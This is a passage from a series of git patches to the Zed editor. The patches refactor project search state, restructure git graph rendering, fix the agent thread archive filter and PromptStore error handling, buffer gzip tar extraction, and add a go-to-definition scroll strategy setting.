anyhow::Error> { first_match = Some(time); println!("First match found after {time:?}"); } - if let SearchResult::Buffer { ranges, .. } = match_result { - matched_files += 1; - matched_chunks += ranges.len(); - } else { - break; + match match_result { + SearchResult::Buffer { ranges, .. } => { + matched_files += 1; + matched_chunks += ranges.len(); + } + SearchResult::LimitReached => break, + SearchResult::WaitingForScan | SearchResult::Searching => continue, } } let elapsed = timer.elapsed(); diff --git a/crates/remote_server/src/remote_editing_tests.rs b/crates/remote_server/src/remote_editing_tests.rs index 6f2c2e3f22369b..825c0ba26c0474 100644 --- a/crates/remote_server/src/remote_editing_tests.rs +++ b/crates/remote_server/src/remote_editing_tests.rs @@ -200,9 +200,13 @@ async fn do_search_and_assert( let mut buffers = Vec::new(); for expected_path in expected_paths { - let response = receiver.rx.recv().await.unwrap(); - let SearchResult::Buffer { buffer, .. } = response else { - panic!("incorrect result"); + let buffer = loop { + let response = receiver.rx.recv().await.unwrap(); + match response { + SearchResult::Buffer { buffer, .. 
} => break buffer, + SearchResult::LimitReached => panic!("incorrect result"), + SearchResult::WaitingForScan | SearchResult::Searching => continue, + } }; buffer.update(&mut cx, |buffer, cx| { assert_eq!( diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index 6a092818a02bef..00966436595136 100644 --- a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -235,15 +235,44 @@ pub struct ProjectSearch { active_query: Option, last_search_query_text: Option, search_id: usize, - no_results: Option, - limit_reached: bool, - waiting_for_scan: bool, + search_state: SearchState, search_history_cursor: SearchHistoryCursor, search_included_history_cursor: SearchHistoryCursor, search_excluded_history_cursor: SearchHistoryCursor, _excerpts_subscription: Subscription, } +#[derive(Clone, Copy, Debug, Default, PartialEq, Eq)] +enum SearchState { + #[default] + Idle, + Running(SearchActivity), + Completed(SearchCompletion), +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +enum SearchActivity { + Searching, + WaitingForScan, +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +enum SearchCompletion { + NoResults, + Results { limit_reached: bool }, +} + +impl SearchState { + fn limit_reached(self) -> bool { + matches!( + self, + SearchState::Completed(SearchCompletion::Results { + limit_reached: true + }) + ) + } +} + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] enum InputPanel { Query, @@ -298,9 +327,7 @@ impl ProjectSearch { active_query: None, last_search_query_text: None, search_id: 0, - no_results: None, - limit_reached: false, - waiting_for_scan: false, + search_state: SearchState::Idle, search_history_cursor: Default::default(), search_included_history_cursor: Default::default(), search_excluded_history_cursor: Default::default(), @@ -323,9 +350,11 @@ impl ProjectSearch { active_query: self.active_query.clone(), last_search_query_text: self.last_search_query_text.clone(), search_id: self.search_id, - 
no_results: self.no_results, - limit_reached: self.limit_reached, - waiting_for_scan: false, + search_state: if self.pending_search.is_some() { + SearchState::Idle + } else { + self.search_state + }, search_history_cursor: self.search_history_cursor.clone(), search_included_history_cursor: self.search_included_history_cursor.clone(), search_excluded_history_cursor: self.search_excluded_history_cursor.clone(), @@ -413,6 +442,7 @@ impl ProjectSearch { self.search_id += 1; self.active_query = Some(query); self.match_ranges.clear(); + self.search_state = SearchState::Running(SearchActivity::Searching); self.pending_search = Some(cx.spawn(async move |project_search, cx| { let SearchResults { rx, _task_handle } = search; @@ -423,19 +453,16 @@ impl ProjectSearch { project_search .excerpts .update(cx, |excerpts, cx| excerpts.clear(cx)); - project_search.no_results = Some(true); - project_search.limit_reached = false; - project_search.waiting_for_scan = false; }) .ok()?; let mut limit_reached = false; while let Some(results) = matches.next().await { - let (buffers_with_ranges, has_reached_limit, is_waiting_for_scan) = cx + let (buffers_with_ranges, has_reached_limit, search_activity) = cx .background_executor() .spawn(async move { let mut limit_reached = false; - let mut waiting_for_scan = false; + let mut search_activity = None; let mut buffers_with_ranges = Vec::with_capacity(results.len()); for result in results { match result { @@ -446,18 +473,21 @@ impl ProjectSearch { limit_reached = true; } project::search::SearchResult::WaitingForScan => { - waiting_for_scan = true; + search_activity = Some(SearchActivity::WaitingForScan); + } + project::search::SearchResult::Searching => { + search_activity = Some(SearchActivity::Searching); } } } - (buffers_with_ranges, limit_reached, waiting_for_scan) + (buffers_with_ranges, limit_reached, search_activity) }) .await; limit_reached |= has_reached_limit; - if is_waiting_for_scan { + if let Some(search_activity) = search_activity { 
project_search .update(cx, |project_search, cx| { - project_search.waiting_for_scan = true; + project_search.search_state = SearchState::Running(search_activity); cx.notify(); }) .ok()?; @@ -495,11 +525,11 @@ impl ProjectSearch { project_search .update(cx, |project_search, cx| { - if !project_search.match_ranges.is_empty() { - project_search.no_results = Some(false); - } - project_search.limit_reached = limit_reached; - project_search.waiting_for_scan = false; + project_search.search_state = if project_search.match_ranges.is_empty() { + SearchState::Completed(SearchCompletion::NoResults) + } else { + SearchState::Completed(SearchCompletion::Results { limit_reached }) + }; project_search.pending_search.take(); cx.notify(); }) @@ -531,36 +561,26 @@ impl Render for ProjectSearchView { .child(self.results_editor.clone()) } else { let model = self.entity.read(cx); - let has_no_results = model.no_results.unwrap_or(false); - let is_search_underway = model.pending_search.is_some(); - let is_waiting_for_scan = model.waiting_for_scan; - - let heading_text = if is_waiting_for_scan { - "Loading project…" - } else if is_search_underway { - "Searching…" - } else if has_no_results { - "No Results" - } else { - "Search All Files" + + let heading_text = match model.search_state { + SearchState::Running(SearchActivity::WaitingForScan) => "Loading project…", + SearchState::Running(SearchActivity::Searching) => "Searching…", + SearchState::Completed(SearchCompletion::NoResults) => "No Results", + _ => "Search All Files", }; let heading_text = div() .justify_center() .child(Label::new(heading_text).size(LabelSize::Large)); - let page_content: Option = if let Some(no_results) = model.no_results { - if model.pending_search.is_none() && no_results { - Some( - Label::new("No results found in this project for the provided query") - .size(LabelSize::Small) - .into_any_element(), - ) - } else { - None - } - } else { - Some(self.landing_text_minor(cx).into_any_element()) + let page_content: 
Option = match model.search_state { + SearchState::Idle => Some(self.landing_text_minor(cx).into_any_element()), + SearchState::Completed(SearchCompletion::NoResults) => Some( + Label::new("No results found in this project for the provided query") + .size(LabelSize::Small) + .into_any_element(), + ), + _ => None, }; let page_content = page_content.map(|text| div().child(text)); @@ -2179,16 +2199,19 @@ impl Render for ProjectSearchBar { }; let theme_colors = cx.theme().colors(); let project_search = search.entity.read(cx); - let limit_reached = project_search.limit_reached; + let limit_reached = project_search.search_state.limit_reached(); let is_search_underway = project_search.pending_search.is_some(); let color_override = match ( - &project_search.pending_search, - project_search.no_results, + project_search.search_state, &project_search.active_query, &project_search.last_search_query_text, ) { - (None, Some(true), Some(q), Some(p)) if q.as_str() == p => Some(Color::Error), + ( + SearchState::Completed(SearchCompletion::NoResults), + Some(query), + Some(previous_query), + ) if query.as_str() == previous_query => Some(Color::Error), _ => None, }; From 5c1462d4e3e08e009f5ba2685c67a586911f3823 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Fri, 24 Apr 2026 07:44:36 -0400 Subject: [PATCH 008/231] Fix broken rustfmt in git graph code (#54730) rustfmt is broken in this code. I believe it's too deep / complex in the builder pattern. After factoring some bits out, it now auto formats. 
Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- crates/git_graph/src/git_graph.rs | 250 +++++++++++++----------------- 1 file changed, 109 insertions(+), 141 deletions(-) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index e0f4afff467f90..6d3d99ee2a98aa 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -2766,39 +2766,35 @@ impl Render for GitGraph { .flex() .flex_col() .child(render_table_header( - if !is_file_history { - - TableRow::from_vec( - vec![ - Label::new("Graph") - .color(Color::Muted) - .truncate() - .into_any_element(), - Label::new("Description") - .color(Color::Muted) - .into_any_element(), - Label::new("Date").color(Color::Muted).into_any_element(), - Label::new("Author").color(Color::Muted).into_any_element(), - Label::new("Commit").color(Color::Muted).into_any_element(), - ], - 5, - ) - } else { - TableRow::from_vec( - vec![ - Label::new("Description") - .color(Color::Muted) - .into_any_element(), - Label::new("Date").color(Color::Muted).into_any_element(), - Label::new("Author").color(Color::Muted).into_any_element(), - Label::new("Commit").color(Color::Muted).into_any_element(), - ], - 4, - ) - - }, - + TableRow::from_vec( + vec![ + Label::new("Graph") + .color(Color::Muted) + .truncate() + .into_any_element(), + Label::new("Description") + .color(Color::Muted) + .into_any_element(), + Label::new("Date").color(Color::Muted).into_any_element(), + Label::new("Author").color(Color::Muted).into_any_element(), + Label::new("Commit").color(Color::Muted).into_any_element(), + ], + 5, + ) + } else { + 
TableRow::from_vec( + vec![ + Label::new("Description") + .color(Color::Muted) + .into_any_element(), + Label::new("Date").color(Color::Muted).into_any_element(), + Label::new("Author").color(Color::Muted).into_any_element(), + Label::new("Commit").color(Color::Muted).into_any_element(), + ], + 4, + ) + }, header_context, Some(header_resize_info), Some(self.column_widths.entity_id()), @@ -2811,6 +2807,85 @@ impl Render for GitGraph { let weak_self = cx.weak_entity(); let focus_handle = self.focus_handle.clone(); + let graph_canvas = div() + .id("graph-canvas") + .size_full() + .overflow_hidden() + .child( + div() + .size_full() + .child(self.render_graph_canvas(window, cx)), + ) + .on_scroll_wheel(cx.listener(Self::handle_graph_scroll)) + .on_mouse_move(cx.listener(Self::handle_graph_mouse_move)) + .on_click(cx.listener(Self::handle_graph_click)) + .on_hover(cx.listener(|this, &is_hovered: &bool, _, cx| { + if !is_hovered && this.hovered_entry_idx.is_some() { + this.hovered_entry_idx = None; + cx.notify(); + } + })); + + let commits_table = Table::new(4) + .interactable(&self.table_interaction_state) + .hide_row_borders() + .hide_row_hover() + .width_config(table_width_config) + .map_row(move |(index, row), window, cx| { + let is_selected = selected_entry_idx == Some(index); + let is_hovered = hovered_entry_idx == Some(index); + let is_focused = focus_handle.is_focused(window); + let weak = weak_self.clone(); + let weak_for_hover = weak.clone(); + + let hover_bg = cx.theme().colors().element_hover.opacity(0.6); + let selected_bg = if is_focused { + cx.theme().colors().element_selected + } else { + cx.theme().colors().element_hover + }; + + row.h(row_height) + .when(is_selected, |row| row.bg(selected_bg)) + .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) + .on_hover(move |&is_hovered, _, cx| { + weak_for_hover + .update(cx, |this, cx| { + if is_hovered { + if this.hovered_entry_idx != Some(index) { + this.hovered_entry_idx = Some(index); + cx.notify(); + } 
+ } else if this.hovered_entry_idx == Some(index) + { + this.hovered_entry_idx = None; + cx.notify(); + } + }) + .ok(); + }) + .on_click(move |event, window, cx| { + let click_count = event.click_count(); + weak.update(cx, |this, cx| { + this.select_entry( + index, + ScrollStrategy::Center, + cx, + ); + if click_count >= 2 { + this.open_commit_view(index, window, cx); + } + }) + .ok(); + }) + .into_any_element() + }) + .uniform_list( + "git-graph-commits", + commit_count, + cx.processor(Self::render_table_rows), + ); + bind_redistributable_columns( div() .relative() @@ -2827,34 +2902,7 @@ impl Render for GitGraph { .h_full() .min_w_0() .overflow_hidden() - .child( - div() - .id("graph-canvas") - .size_full() - .overflow_hidden() - .child( - div() - .size_full() - .child(self.render_graph_canvas(window, cx)), - ) - .on_scroll_wheel( - cx.listener(Self::handle_graph_scroll), - ) - .on_mouse_move( - cx.listener(Self::handle_graph_mouse_move), - ) - .on_click(cx.listener(Self::handle_graph_click)) - .on_hover(cx.listener( - |this, &is_hovered: &bool, _, cx| { - if !is_hovered - && this.hovered_entry_idx.is_some() - { - this.hovered_entry_idx = None; - cx.notify(); - } - }, - )), - ), + .child(graph_canvas), ) }) .child( @@ -2862,87 +2910,7 @@ impl Render for GitGraph { .w(DefiniteLength::Fraction(table_fraction)) .h_full() .min_w_0() - .child( - Table::new(4) - .interactable(&self.table_interaction_state) - .hide_row_borders() - .hide_row_hover() - .width_config(table_width_config) - .map_row(move |(index, row), window, cx| { - let is_selected = - selected_entry_idx == Some(index); - let is_hovered = - hovered_entry_idx == Some(index); - let is_focused = - focus_handle.is_focused(window); - let weak = weak_self.clone(); - let weak_for_hover = weak.clone(); - - let hover_bg = cx - .theme() - .colors() - .element_hover - .opacity(0.6); - let selected_bg = if is_focused { - cx.theme().colors().element_selected - } else { - cx.theme().colors().element_hover - }; - - 
row.h(row_height) - .when(is_selected, |row| row.bg(selected_bg)) - .when( - is_hovered && !is_selected, - |row| row.bg(hover_bg), - ) - .on_hover(move |&is_hovered, _, cx| { - weak_for_hover - .update(cx, |this, cx| { - if is_hovered { - if this.hovered_entry_idx - != Some(index) - { - this.hovered_entry_idx = - Some(index); - cx.notify(); - } - } else if this - .hovered_entry_idx - == Some(index) - { - this.hovered_entry_idx = - None; - cx.notify(); - } - }) - .ok(); - }) - .on_click(move |event, window, cx| { - let click_count = event.click_count(); - weak.update(cx, |this, cx| { - this.select_entry( - index, - ScrollStrategy::Center, - cx, - ); - if click_count >= 2 { - this.open_commit_view( - index, - window, - cx, - ); - } - }) - .ok(); - }) - .into_any_element() - }) - .uniform_list( - "git-graph-commits", - commit_count, - cx.processor(Self::render_table_rows), - ), - ), + .child(commits_table), ), ) .child(render_redistributable_columns_resize_handles( From c47c5c1e1329f46d482c5c0ff36dacc1aec51f84 Mon Sep 17 00:00:00 2001 From: XiaoYan Li Date: Fri, 24 Apr 2026 21:02:08 +0900 Subject: [PATCH 009/231] agent_ui: Switch to All filter when last archived thread is removed (#54763) When the archive view's filter is set to "Archived Only" and the user deletes (or unarchives) the last archived thread, the toggle button becomes disabled because there are no archived threads left. With the filter still pinned to "Archived Only", the list goes empty and there's no way for the user to switch back to the All view. This fixes it by automatically falling back to `ThreadFilter::All` inside `update_items` whenever the current filter is `ArchivedOnly` but the store has no archived entries. Since `update_items` is invoked from the `ThreadMetadataStore` observer, this covers all paths that mutate the store, not only deletions triggered from this view. 
Release Notes: - Fixed the agent thread archive view getting stuck on an empty "Archived Only" list after the last archived thread was removed. --------- Co-authored-by: Neel --- crates/agent_ui/src/threads_archive_view.rs | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index e6e9ca4f5f5c09..892c6b0c0e4fb7 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -261,9 +261,19 @@ impl ThreadsArchiveView { } fn update_items(&mut self, cx: &mut Context) { + let store = ThreadMetadataStore::global(cx).read(cx); + + // If we're filtering to archived threads but none remain (e.g. the + // user just deleted the last one), fall back to showing all threads + // so they aren't stranded with an empty list and a disabled toggle. + if self.thread_filter == ThreadFilter::ArchivedOnly + && store.archived_entries().next().is_none() + { + self.thread_filter = ThreadFilter::All; + } + let thread_filter = self.thread_filter; - let sessions = ThreadMetadataStore::global(cx) - .read(cx) + let sessions = store .entries() .filter(|t| match thread_filter { ThreadFilter::All => true, From e15e5b84b5d884349daecc80c5635f7a1352f570 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Fri, 24 Apr 2026 08:32:28 -0400 Subject: [PATCH 010/231] Don't block thread creation when PromptStore fails to initialize (#52333) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit NativeAgentServer::connect used `prompt_store.await?` which turned any PromptStore initialization failure (permission denied, disk issues, etc.) into a hard connection error, putting the ConversationView into LoadError state and preventing all new native agent threads from being created. Changed to `.log_err()` so the error is logged at ERROR level but thread creation proceeds with `prompt_store: None`. 
`NativeAgent::new` already accepts `Option>` and handles `None` gracefully — user custom prompts won't load but threads still work. Added a regression test that serializes a stale thread ID, loads the panel (triggering the "last active thread not found in database" warning), then dispatches NewThread through the real NativeAgentServer path and verifies it produces a connected thread. Release Notes: - Agent panel now handles filesystem errors more gracefully --- crates/agent/src/native_agent_server.rs | 7 +++-- crates/agent_ui/src/agent_panel.rs | 38 +++++++++++++++++++++++++ 2 files changed, 42 insertions(+), 3 deletions(-) diff --git a/crates/agent/src/native_agent_server.rs b/crates/agent/src/native_agent_server.rs index b79cd67b598bfa..bc0f75bcff591f 100644 --- a/crates/agent/src/native_agent_server.rs +++ b/crates/agent/src/native_agent_server.rs @@ -11,6 +11,7 @@ use language_model::{LanguageModelId, LanguageModelProviderId, LanguageModelRegi use project::{AgentId, Project}; use prompt_store::PromptStore; use settings::{LanguageModelSelection, Settings as _, update_settings_file}; +use util::ResultExt as _; use crate::{NativeAgent, NativeAgentConnection, ThreadStore, templates::Templates}; @@ -48,11 +49,11 @@ impl AgentServer for NativeAgentServer { cx.spawn(async move |cx| { log::debug!("Creating templates for native agent"); let templates = Templates::new(); - let prompt_store = prompt_store.await?; + let prompt_store = prompt_store.await.log_err(); log::debug!("Creating native agent entity"); - let agent = cx - .update(|cx| NativeAgent::new(thread_store, templates, Some(prompt_store), fs, cx)); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, templates, prompt_store, fs, cx)); // Create the connection wrapper let connection = NativeAgentConnection(agent); diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index e5c6f1610225d2..3ef0934e2deedc 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ 
b/crates/agent_ui/src/agent_panel.rs @@ -7123,4 +7123,42 @@ mod tests { ); }); } + + /// Regression test: NewThread must produce a connected thread even when + /// the PromptStore fails to initialize (e.g. LMDB permission error). + /// Before the fix, `NativeAgentServer::connect` propagated the + /// PromptStore error with `?`, which put every new ConversationView + /// into LoadError and made it impossible to start any native-agent + /// thread. + #[gpui::test] + async fn test_new_thread_with_prompt_store_error(cx: &mut TestAppContext) { + let (panel, mut cx) = setup_panel(cx).await; + + // NativeAgentServer::connect needs a global Fs. + let fs = FakeFs::new(cx.executor()); + cx.update(|_, cx| { + ::set_global(fs.clone(), cx); + }); + cx.run_until_parked(); + + // Dispatch NewThread, which goes through the real NativeAgentServer + // path. In tests the PromptStore LMDB open fails with + // "Permission denied"; the fix (.log_err() instead of ?) lets + // the connection succeed anyway. + panel.update_in(&mut cx, |panel, window, cx| { + panel.new_thread(&NewThread, window, cx); + }); + cx.run_until_parked(); + + panel.read_with(&cx, |panel, cx| { + assert!( + panel.active_conversation_view().is_some(), + "panel should have a conversation view after NewThread" + ); + assert!( + panel.active_agent_thread(cx).is_some(), + "panel should have an active, connected agent thread" + ); + }); + } } From a0f58a092f0b1bbf6a85dfa329d5850d541502a4 Mon Sep 17 00:00:00 2001 From: Riccardo Strina <85676009+tartarughina@users.noreply.github.com> Date: Fri, 24 Apr 2026 14:42:45 +0200 Subject: [PATCH 011/231] Fix gzip tar extraction by buffering decompressed bytes (#54696) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When extracting gzip tar files, the `GzipDecoder` was being pinned directly over the response body stream. 
This caused issues because the decoder needs to read the entire stream into memory before the `Archive` can be created and used. Buffer the compressed bytes into a `Vec` first, then create the decoder over that in-memory buffer to ensure all data is available when needed. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes [Java extension issue 222](https://github.com/zed-extensions/java/issues/222) Testing: **Automated:** - `cargo test -p extension_host test_extension_store_with_test_extension` — integration test that exercises the full `download_file` → `GzipTar` → `extract_tar_file` path through a WASM extension with a `FakeHttpClient` serving a real gzipped tar archive. Passed. **Manual:** - Built and ran Zed with `cargo +nightly run`, deleted and reinstalled the Java extension. The extension's language server download completed successfully and all expected files were extracted. Release Notes: - Fixed extension `download_file` with `GzipTar` silently dropping archive entries by buffering the full HTTP response before extraction, matching the approach already used for extension installation. 
See https://github.com/zed-industries/zed/blob/c6bdb697343cd470f96a56a5c5d288524baf4599/crates/extension_host/src/extension_host.rs#L761 --- .../extension_host/src/wasm_host/wit/since_v0_1_0.rs | 11 +++++++---- .../extension_host/src/wasm_host/wit/since_v0_8_0.rs | 11 +++++++---- 2 files changed, 14 insertions(+), 8 deletions(-) diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs index 4cd034d4d6af02..fca4dca2459e33 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs @@ -531,7 +531,7 @@ impl ExtensionImports for WasmState { "download failed with status {}", response.status() ); - let body = BufReader::new(response.body_mut()); + let mut body = BufReader::new(response.body_mut()); match file_type { DownloadedFileType::Uncompressed => { @@ -550,11 +550,14 @@ impl ExtensionImports for WasmState { .await?; } DownloadedFileType::GzipTar => { - let body = GzipDecoder::new(body); - futures::pin_mut!(body); + let mut tar_gz_bytes = Vec::new(); + body.read_to_end(&mut tar_gz_bytes).await?; + let decompressed_bytes = + GzipDecoder::new(BufReader::new(tar_gz_bytes.as_slice())); + futures::pin_mut!(decompressed_bytes); self.host .fs - .extract_tar_file(&destination_path, Archive::new(body)) + .extract_tar_file(&destination_path, Archive::new(decompressed_bytes)) .await?; } DownloadedFileType::Zip => { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index 660ddd9688f7dc..683e69e08704dc 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -1072,7 +1072,7 @@ impl ExtensionImports for WasmState { "download failed with status {}", response.status() ); - let body = BufReader::new(response.body_mut()); + let mut body = BufReader::new(response.body_mut()); match file_type { 
DownloadedFileType::Uncompressed => { @@ -1091,11 +1091,14 @@ impl ExtensionImports for WasmState { .await?; } DownloadedFileType::GzipTar => { - let body = GzipDecoder::new(body); - futures::pin_mut!(body); + let mut tar_gz_bytes = Vec::new(); + body.read_to_end(&mut tar_gz_bytes).await?; + let decompressed_bytes = + GzipDecoder::new(BufReader::new(tar_gz_bytes.as_slice())); + futures::pin_mut!(decompressed_bytes); self.host .fs - .extract_tar_file(&destination_path, Archive::new(body)) + .extract_tar_file(&destination_path, Archive::new(decompressed_bytes)) .await?; } DownloadedFileType::Zip => { From 35dcfec7eba31349cdc2954824f1b1c8d79a80f6 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Fri, 24 Apr 2026 15:43:30 +0300 Subject: [PATCH 012/231] Reveal all go to definitions in the center by default (#54778) Allows to reconfigure behavior, including the previous one, `top` Closes https://github.com/zed-industries/zed/issues/52173 Release Notes: - Reworked go to definition to open its target in the center of the editor. Can be reconfigured with `go_to_definition_scroll_strategy`. --- assets/settings/default.json | 7 ++++++ crates/editor/src/editor.rs | 10 +++++--- crates/editor/src/editor_settings.rs | 9 ++++--- crates/editor/src/scroll/autoscroll.rs | 11 +++++++++ crates/settings/src/vscode_import.rs | 1 + crates/settings_content/src/editor.rs | 34 ++++++++++++++++++++++++++ crates/settings_ui/src/page_data.rs | 20 ++++++++++++++- crates/settings_ui/src/settings_ui.rs | 1 + docs/src/reference/all-settings.md | 32 ++++++++++++++++++++++++ 9 files changed, 117 insertions(+), 8 deletions(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index 7e942393d57088..464587e6290b2f 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -355,6 +355,13 @@ // 1. Do nothing: `none` // 2. 
Find references for the same symbol: `find_all_references` (default) "go_to_definition_fallback": "find_all_references", + // How to scroll the target into view when navigating to a definition or reference + // (e.g. Go to Definition, Go to Type Definition, Find All References). + // + // 1. Vertically center the target in the viewport: `center` (default) + // 2. Scroll the minimum amount needed to make the target visible: `minimum` + // 3. Scroll so the target appears near the top of the viewport: `top` + "go_to_definition_scroll_strategy": "center", // Which level to use to filter out diagnostics displayed in the editor. // // Affects the editor rendering only, and does not interrupt diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 7d425fa98f4f03..8110c211a502c3 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -18339,7 +18339,7 @@ impl Editor { }; let anchor_range = range.to_anchors(&multibuffer.snapshot(cx)); self.change_selections( - SelectionEffects::default().nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)).nav_history(true), window, cx, |s| s.select_anchor_ranges([anchor_range]), @@ -19145,7 +19145,8 @@ impl Editor { } editor.change_selections( - SelectionEffects::default().nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19224,7 +19225,8 @@ impl Editor { } target_editor.change_selections( - SelectionEffects::default().nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19504,7 +19506,7 @@ impl Editor { let Range { start, end } = locations[destination_location_index]; editor.update_in(cx, |editor, window, cx| { - let effects = SelectionEffects::default(); + let effects = SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)); 
editor.unfold_ranges(&[start..end], false, false, cx); editor.change_selections(effects, window, cx, |s| { diff --git a/crates/editor/src/editor_settings.rs b/crates/editor/src/editor_settings.rs index b35bce02af4a56..1999d0e537e525 100644 --- a/crates/editor/src/editor_settings.rs +++ b/crates/editor/src/editor_settings.rs @@ -5,9 +5,10 @@ use language::CursorShape; use project::project_settings::DiagnosticSeverity; pub use settings::{ CodeLens, CompletionDetailAlignment, CurrentLineHighlight, DelayMs, DiffViewStyle, DisplayIn, - DocumentColorsRenderMode, DoubleClickInMultibuffer, GoToDefinitionFallback, HideMouseMode, - MinimapThumb, MinimapThumbBorder, MultiCursorModifier, ScrollBeyondLastLine, - ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, SnippetSortOrder, + DocumentColorsRenderMode, DoubleClickInMultibuffer, GoToDefinitionFallback, + GoToDefinitionScrollStrategy, HideMouseMode, MinimapThumb, MinimapThumbBorder, + MultiCursorModifier, ScrollBeyondLastLine, ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, + SnippetSortOrder, }; use settings::{RegisterSetting, RelativeLineNumbers, Settings}; use ui::scrollbars::ShowScrollbar; @@ -52,6 +53,7 @@ pub struct EditorSettings { pub auto_signature_help: bool, pub show_signature_help_after_edits: bool, pub go_to_definition_fallback: GoToDefinitionFallback, + pub go_to_definition_scroll_strategy: GoToDefinitionScrollStrategy, pub jupyter: Jupyter, pub hide_mouse: Option, pub snippet_sort_order: SnippetSortOrder, @@ -285,6 +287,7 @@ impl Settings for EditorSettings { auto_signature_help: editor.auto_signature_help.unwrap(), show_signature_help_after_edits: editor.show_signature_help_after_edits.unwrap(), go_to_definition_fallback: editor.go_to_definition_fallback.unwrap(), + go_to_definition_scroll_strategy: editor.go_to_definition_scroll_strategy.unwrap(), jupyter: Jupyter { enabled: editor.jupyter.unwrap().enabled.unwrap(), }, diff --git a/crates/editor/src/scroll/autoscroll.rs 
b/crates/editor/src/scroll/autoscroll.rs index c2b07ffa96aef4..38f0f4b022899f 100644 --- a/crates/editor/src/scroll/autoscroll.rs +++ b/crates/editor/src/scroll/autoscroll.rs @@ -2,6 +2,7 @@ use crate::{ DisplayPoint, DisplayRow, Editor, EditorMode, EditorSettings, LineWithInvisibles, RowExt, SelectionEffects, display_map::{DisplaySnapshot, ToDisplayPoint}, + editor_settings::GoToDefinitionScrollStrategy, scroll::{ScrollOffset, WasScrolled}, }; use gpui::{App, Bounds, Context, Pixels, Window}; @@ -33,6 +34,16 @@ impl Autoscroll { Self::Strategy(AutoscrollStrategy::Center, None) } + /// Returns the autoscroll strategy configured for navigation to definitions + /// and references, based on `go_to_definition_scroll_strategy`. + pub fn for_go_to_definition(cx: &App) -> Self { + match EditorSettings::get_global(cx).go_to_definition_scroll_strategy { + GoToDefinitionScrollStrategy::Center => Self::center(), + GoToDefinitionScrollStrategy::Minimum => Self::fit(), + GoToDefinitionScrollStrategy::Top => Self::focused(), + } + } + /// scrolls so the newest cursor is near the top /// (offset by vertical_scroll_margin) pub fn focused() -> Self { diff --git a/crates/settings/src/vscode_import.rs b/crates/settings/src/vscode_import.rs index 31bcaf847b09c7..64f00bc5d6501b 100644 --- a/crates/settings/src/vscode_import.rs +++ b/crates/settings/src/vscode_import.rs @@ -265,6 +265,7 @@ impl VsCodeSettings { fast_scroll_sensitivity: self.read_f32("editor.fastScrollSensitivity"), sticky_scroll: self.sticky_scroll_content(), go_to_definition_fallback: None, + go_to_definition_scroll_strategy: None, gutter: self.gutter_content(), hide_mouse: None, horizontal_scroll_margin: None, diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 3ba21e830828b4..18a7bd5fd497ce 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -192,6 +192,12 @@ pub struct EditorSettingsContent { /// Default: FindAllReferences pub 
